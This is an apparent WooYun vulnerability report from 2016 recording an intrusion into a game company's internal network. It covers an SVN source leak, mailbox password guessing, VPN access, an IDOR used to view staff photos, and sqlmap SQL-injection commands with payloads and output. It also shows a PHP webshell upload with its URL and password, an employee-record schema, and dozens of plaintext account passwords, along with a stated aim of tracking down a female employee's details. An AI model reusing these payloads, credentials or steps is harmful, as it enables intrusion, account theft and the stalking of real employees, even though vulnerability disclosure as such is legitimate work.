当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0171420

漏洞标题:博雅互动内网漫游

相关厂商:boyaa.com

漏洞作者: hecate

提交时间:2016-01-20 18:26

修复时间:2016-03-05 09:52

公开时间:2016-03-05 09:52

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-20: 细节已通知厂商并且等待厂商处理中
2016-01-20: 厂商已经确认,细节仅向厂商公开
2016-01-30: 细节向核心白帽子及相关领域专家公开
2016-02-09: 细节向普通白帽子公开
2016-02-19: 细节向实习白帽子公开
2016-03-05: 细节向公众公开

简要描述:

我和另一个人同时胡一张牌,为什么只能他胡,而我不能胡牌
四川麻将是两个人可以同时胡一张牌啊,游戏里面怎么不行呢 ╮(╯▽╰)╭

详细说明:

1.清一色胡牌

cbb2cc234ac4e7b0bc803871fed58958.jpeg


2.扫描boyaa.com子域名,发现svn源代码泄露

http://notice.boyaa.com/.svn/entries


导致整站源代码可下载

123.png


在/application/libraries/ByoaaMail.php文件中发现邮箱密码信息

124.png


3.登录邮箱

126.png


收件箱神马都没有,先拖出通讯簿里所有用户,以便后续渗透

125_meitu_1.jpg


上个星期用拼音字典爆破了一下没有结果,原来贵公司用户名全英文啊,账户体系控制挺严,但是一个svn泄露就可能使内网沦陷
4.利用收集到的英文用户名对邮箱进行精细化fuzzing, 最后只得到一个结果

https://mail.boyaa.com
TonyTan         boyaa@2015


邮箱里面没找到密码信息,只找到vpn登录地址 https://sslvpn.boyaa.com
5.登录vpn,进入内网

22.png


oa系统

33.png


在个人资料页存在越权
这是我登录的个人信息http://basic.oa.com/user/myInfo/495
修改后面的id就看到了ceo的高清果照 http://basic.oa.com/user/myInfo/1

54_meitu_1.jpg


对ceo不感兴趣 然后继续改id,看看有木有漂亮的女汉子,终于找到一个

ee_meitu_2.jpg


看来oa.com域名只对内网解析,接着使用挖掘机挖出了oa.com的子域名

oa.com   192.168.97.40   nginx
www.oa.com   192.168.97.40   nginx
d.oa.com   175.45.5.224   nginx
r.oa.com   119.81.169.172   nginx
t.oa.com   208.43.166.72   nginx
h5.oa.com   192.168.202.87   nginx/1.6.3
cms.oa.com   192.168.97.56   nginx
blog.oa.com   192.168.203.226   nginx
ai.oa.com   192.168.202.92   nginx
app.oa.com   192.168.203.222   nginx
apk.oa.com   192.168.201.168   nginx
api.oa.com   192.168.97.55   webserver
feedback.oa.com   173.192.176.203   nginx
ab.oa.com   124.238.249.19   webserver
bbs.oa.com   192.168.97.55   webserver
mobile.oa.com   192.168.97.10   nginx
m.oa.com   218.213.244.148   webserver
my.oa.com   192.168.97.55   webserver
admin.oa.com   58.83.134.23   nginx
shop.oa.com   192.168.97.56   nginx
server.oa.com   175.45.32.169   nginx
360.oa.com   192.168.97.55   webserver
video.oa.com   192.168.203.216   webserver
pay.oa.com   192.168.201.65   nginx
pm.oa.com   192.168.97.55   webserver
tool.oa.com   192.168.97.56   nginx
jiankong.oa.com   175.45.32.169   nginx
kf.oa.com   192.168.97.56   nginx
monitor.oa.com   192.168.97.55   webserver
mysql.oa.com   175.45.32.169   nginx
file.oa.com   192.168.97.55   webserver
cacti.oa.com   10.10.100.252   nginx
auth.oa.com   192.168.97.56   nginx
cd.oa.com   192.168.200.171   nginx
channel.oa.com   175.45.5.224   nginx
zabbix.oa.com   210.5.191.169   nginx
data.oa.com   210.5.191.165   nginx
dc.oa.com   175.45.5.223   nginx
svn.oa.com   192.168.97.36   webserver
dev.oa.com   192.168.200.171   nginx
ct.oa.com   124.238.246.43   webserver


对子域名进行扫描发现多个注入点,真是呵呵哒~

①一个wiki系统,没有打补丁
sqlmap -u "http://iddz.oa.com/lywiki/index.php?edition-compare-1" --data "eid[0]=2&eid[1]=19&eid[2]=-3" -p 'eid[2]' --dbs
---
Parameter: eid[2] (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: eid[0]=2&eid[1]=19&eid[2]=-3) AND (SELECT * FROM (SELECT(SLEEP(5)))VOBE) AND (9817=9817
---
[16:02:21] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
available databases [14]:
[*] `test`
[*] apk_bk
[*] apk_control
[*] apk_multi
[*] apk_test
[*] dfwiki
[*] feedback
[*] information_schema
[*] landlord_bbs
[*] landlord_weixin
[*] mysql
[*] phpdoc
[*] reqm
[*] wiki
②公司月收入好高,数不过来了
56565.png




http://payadmin.oa.com/Interface/index.php?act=getordersfast&mod=order&sid=4&pstatus=2&pstarttime=2016-01-01%2000:00:00&pendtime=2016-01-17%2021:28:35&page=1&_=1453037657253 (GET)
---
Parameter: sid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: act=getordersfast&mod=order&sid=4 AND 1894=1894&pstatus=2&pstarttime=2016-01-01 00:00:00&pendtime=2016-01-17 21:28:35&page=1&_=1453037657253
---
back-end DBMS: MySQL >= 5.0.0
available databases [4]:
[*] information_schema
[*] payadmin
[*] paycenter
[*] test
③知识分享平台
http://kms.oa.com/search.php (POST)
searchtype=0&search=*
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: searchtype=0&search='||(SELECT 'kyPd' FROM DUAL WHERE 8817=8817 AND MAKE_SET(5450=5450,9465))||'
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: searchtype=0&search='||(SELECT 'ilev' FROM DUAL WHERE 8590=8590 AND EXTRACTVALUE(8847,CONCAT(0x5c,0x716a717171,(SELECT (ELT(8847=8847,1))),0x716b787071)))||'
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: searchtype=0&search='||(SELECT 'rJQv' FROM DUAL WHERE 3017=3017 AND (SELECT * FROM (SELECT(SLEEP(5)))scaf))||'
---
back-end DBMS: MySQL 5.1
available databases [3]:
[*] by
[*] information_schema
[*] test


④单点登录系统存在注入,这就致命了

http://sso.oa.com/Admin/handleattent (POST)
do=cancleAttent&gid=1
这里过滤了 > 符号,使用between绕过
sqlmap -u 'http://sso.oa.com/Admin/handleattent' --data 'do=cancleAttent&gid=1' --cookie='' --tamper between.py
available databases [4]:
[*] information_schema
[*] sso
[*] test_sso
[*] test
sso.oa.com_meitu_1.jpg




1902个员工的账号+MD5+电话,时间盲注太慢,年过完了都跑不完,所以就不跑了


⑤会议系统
http://meet.oa.com/ajax.php?cmd=init&mtstart=1453046400&mtend=1453564800 (GET)
Parameter: mtstart (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cmd=init&mtstart=1453046400' AND 6701=6701 AND 'oVIF'='oVIF&mtend=1453564800
    Type: UNION query
    Title: MySQL UNION query (56) - 10 columns
    Payload: cmd=init&mtstart=1453046400' UNION ALL SELECT 56,56,56,CONCAT(0x71767a6a71,0x4b586b486b7566744a5a457871646156747667716c79767061545068737a5244416e47756b596f43,0x716a627071),56,56,56,56,56,56#&mtend=1453564800
---
back-end DBMS: MySQL 5
available databases [6]:
[*] cms
[*] information_schema
[*] list
[*] list_tasklogs
[*] list_tasksext
[*] test


运维管理系统 http://sa.oa.com

66_meitu_1.jpg


这么多服务器,我一个人岂不累死?对了,这次目的是为了找妹子的联系方式
找啊找,找到一处任意文件上传

http://it.oa.com/needs_apply/index?typeId=3&type=opm&yw=0&rand=692548803


789_meitu_1.jpg


ttt_meitu_2.jpg


上传附件处传个php上去getshell

yy_meitu_4.jpg


里面好多sql文件,其中这个文件保存有全公司员工的信息

777_meitu_3.jpg


CREATE TABLE IF NOT EXISTS `pb_user` (
  `id` int(10) unsigned NOT NULL COMMENT '工号',
  `cname` varchar(45) NOT NULL COMMENT '中文姓名',
  `username` varchar(45) NOT NULL COMMENT '英文名,rtx账号',
  `sex` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '性别,0:未知 1:男 2:女',
  `btype` tinyint(1) unsigned DEFAULT '0' COMMENT '生日类别, 0:阳历 1:阴历',
  `birthday` date DEFAULT NULL COMMENT '出生年月日',
  `bhour` varchar(10) DEFAULT NULL COMMENT '出生时辰',
  `nation` tinyint(2) unsigned DEFAULT '0' COMMENT '民族',
  `edate` date NOT NULL COMMENT '入职日期',
  `cdate` date DEFAULT NULL COMMENT '转正日期',
  `groupid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '组织架构,对应pb_group表里的id',
  `position` int(10) unsigned DEFAULT '0' COMMENT '岗位,,对应pb_position表的id',
  `mposition` int(10) unsigned DEFAULT '0' COMMENT '管理职位,对应pb_option表的id',
  `rank` varchar(50) DEFAULT NULL COMMENT '职级',
  `idtype` tinyint(1) unsigned DEFAULT '0' COMMENT '证件类型, 对应option表',
  `idnumber` varchar(30) DEFAULT NULL COMMENT '证件号码',
  `idsdate` date DEFAULT NULL COMMENT '身份证有效期开始日期',
  `idedate` date DEFAULT NULL COMMENT '身份证有效期结束日期',
  `idaddress` varchar(255) DEFAULT NULL COMMENT '身份证地址',
  `utype` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '员工类别,对应pb_option表里的id',
  `location` varchar(45) DEFAULT NULL COMMENT '户口所在地',
  `census` int(10) NOT NULL DEFAULT '0' COMMENT '户籍',
  `hometown` varchar(20) DEFAULT NULL COMMENT '籍贯',
  `ismarray` tinyint(1) unsigned DEFAULT '0' COMMENT '婚否,0:未婚 1:已婚',
  `bank` int(10) unsigned DEFAULT '0' COMMENT '开户银行,对应pb_option表里的id',
  `bnumber` varchar(20) DEFAULT '0' COMMENT '银行账号',
  `ssnumber` varchar(20) DEFAULT '0' COMMENT '社保电脑号',
  `reserve` varchar(20) DEFAULT '0' COMMENT '公积金账号',
  `company` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '所属公司,对应pb_option表里的id',
  `htsdate` date DEFAULT NULL COMMENT '合同开始日期',
  `htedate` date DEFAULT NULL COMMENT '合同结束日期',
  `tutor` int(10) unsigned DEFAULT '0' COMMENT '导师工号',
  `boss` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '直属上级工号',
  `phone` varchar(30) DEFAULT NULL COMMENT '联系电话',
  `email` varchar(50) DEFAULT NULL COMMENT '邮箱',
  `address` varchar(255) DEFAULT NULL COMMENT '现在居住地址',
  `emerman` varchar(25) DEFAULT NULL COMMENT '紧急联系人',
  `emerphone` varchar(20) DEFAULT NULL COMMENT '紧急联系人电话',
  `homephone` varchar(20) DEFAULT NULL COMMENT '家庭联系电话',
  `jobtime` date DEFAULT NULL COMMENT '参加工作时间',
  `lastjob` varchar(50) DEFAULT NULL COMMENT '上家工作单位',
  `wcity` int(10) unsigned DEFAULT '0' COMMENT '工作城市,对应pb_potion表里id',
  `assignment` int(10) unsigned DEFAULT '0' COMMENT '所属外派机构,对应pb_potion表里id',
  `status` int(1) NOT NULL DEFAULT '0' COMMENT '员工状态, 0 待入职 1 在职 2 离职 3.退休',
  `ltype` int(10) unsigned DEFAULT '0' COMMENT '离职类型,对应pb_option表里id',
  `lreason` int(10) unsigned DEFAULT '0' COMMENT '离职原因,对应pb_option表里的id',
  `ldate` date DEFAULT NULL COMMENT '离职日期',
  `trial` tinyint(1) unsigned DEFAULT '0' COMMENT '试用期限,比如:3表示3个月 6表示6个月',
  `remark` text COMMENT '备注',
  `annex` text COMMENT '附件,比如:毕业证 身份证 离职证明的上传附件',
  `sort` int(10) unsigned DEFAULT '1000' COMMENT '排序',
  `key_person` tinyint(1) unsigned NOT NULL DEFAULT '2' COMMENT '是否是基干, 1:基干 2:普通员工',
  `school` varchar(100) DEFAULT NULL COMMENT '毕业院校',
  `degree` int(10) unsigned DEFAULT '0' COMMENT '学历,对应pb_option表里id',
  `specialty` varchar(100) DEFAULT NULL COMMENT '专业',
  `gdate` date DEFAULT NULL COMMENT '毕业日期',
  `photo` varchar(255) DEFAULT NULL COMMENT '用户头像',
  `non_competition` tinyint(1) NOT NULL DEFAULT '0' COMMENT '竞业限制, 0:否 1:是',
  `competition_exec` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否执行竞业协议',
  `marry_date` int(10) NOT NULL DEFAULT '0' COMMENT '结婚纪念日',
  `hobby` varchar(200) NOT NULL DEFAULT '' COMMENT '爱好',
  `speciality` varchar(200) NOT NULL DEFAULT '' COMMENT '特长',
  `jtype` int(10) NOT NULL DEFAULT '0' COMMENT '招聘类型:对应option表id',
  `recom_person` varchar(15) DEFAULT '' COMMENT '推荐人',
  `ulimit` tinyint(1) NOT NULL DEFAULT '1' COMMENT '1:正常工号 2:系统工号 3:客服 4:泰分',
  `addtime` int(10) unsigned NOT NULL COMMENT '记录添加时间',
  `edittime` int(10) unsigned NOT NULL COMMENT '记录最后更新时间',
  PRIMARY KEY (`id`),
  UNIQUE KEY `username` (`username`),
  KEY `fk_pb_user_pb_group1_idx` (`groupid`),
  KEY `fk_pb_user_pb_position1_idx` (`position`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='员工基础信息表';


快速定位目标妹子

ee_meitu_2.jpg


妹子的什么信息都有了,嘿嘿嘿,但是我这么穷,妹子怎么愿意和我做朋友呢?
6.整理出sql文件里面的username和先前邮箱里拖出来的用户名进行 B∪(A∩B)的运算得到总共2000多用户名,再一次对邮箱进行fuzzing得到下面这个账号

KevinPan        Boyaa123456


这个账号邮箱里面让我找到了贵公司的通用密码

RhiciaWirianto	123qwe!!
KritsanaAumkham	123qwe!!
NirachaJunsri	123qwe!!
DomZhang	123qwe!!
AmyWen	        123qwe!!
songweijian	123qwe!!
SevenYang	123qwe!!
JoannaWen	123qwe!!
SisiTian	123qwe!!
SamHe	        123qwe!!
FlytonyChai	123qwe!!
Vickyzhzhou	123qwe!!
MiniShan	123qwe!!
SevenChen	123qwe!!
SalinChen	123qwe!!
XianGuo        	123qwe!!
VenusXia	123qwe!!
DieselWang	123qwe!!
AnnaChen	123qwe!!
KajonSak	123qwe!!
LucknaRa	123qwe!!
AmpornChai	123qwe!!
TalorWang	123qwe!!
KamilMika	123qwe!!
android.en	123qwe!!
android.ru	123qwe!!
Vip009	        123qwe!!
Vip001	        123qwe!!
ios.en	        123qwe!!
ios.id	        123qwe!!
ipokeraws1	123qwe!!
ipokeraws2	123qwe!!
kop	        123qwe!!
Thanaya		qwe123!!
Tunyada		123qwe@@
Suthinee	123qwe@@
Sirion		123qwe@@
Monrat		123qwe@@
Noppachai	123qwe@@
RockZong	123qwe@@
iPoker		123qwe@@
CrazyBull	123qwe@@
Cameracs	123qwe@@
SophieYu	qwe123@@
MoroDeng        123qwe##
boyaa-halink	456qwe!!
paycenter_share	456qwe!!
Wiroonrat	456qwe!!
Alert		456qwe!!
alipay		456qwe!!
android.it	456qwe!!
android.jp	456qwe!!
apple1		456qwe!!
apple1test	456qwe!!
apple2		456qwe!!
apple2test	456qwe!!
appletest	456qwe!!
vip.it		456qwe!!
Vip008		456qwe!!
boyaa-tw360	456qwe!!
financetest	456qwe!!
ios.ar		456qwe!!
offer10		456qwe!!
offer6		456qwe!!
offer7		456qwe!!
offer8		456qwe!!
offer9		456qwe!!
Vip.fr		456qwe!!
slavegame	456qwe!!
Vip007		456qwe!!
Vip002		456qwe!!
wp.pt		456qwe!!
ios.it		456qwe!!
ios.jp		456qwe!!
iloveddz	456qwe!!
alarm		456qwe!!
PerformanceTesting   789qwe!!
Chalermchai     789qwe!!


其中 

alipay		456qwe!!
apple1		456qwe!!


是支付宝绑定邮箱,每时每刻都有¥¥进账

999_meitu_1.jpg

漏洞证明:

rere.jpg


http://it.oa.com/uploadfile/1453091956-27117.php
密码 wooyun

修复方案:

支付宝绑定的邮箱密码要复杂点才好

版权声明:转载请注明来源 hecate@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2016-01-20 18:29

厂商回复:

感谢 正在处理

最新状态:

暂无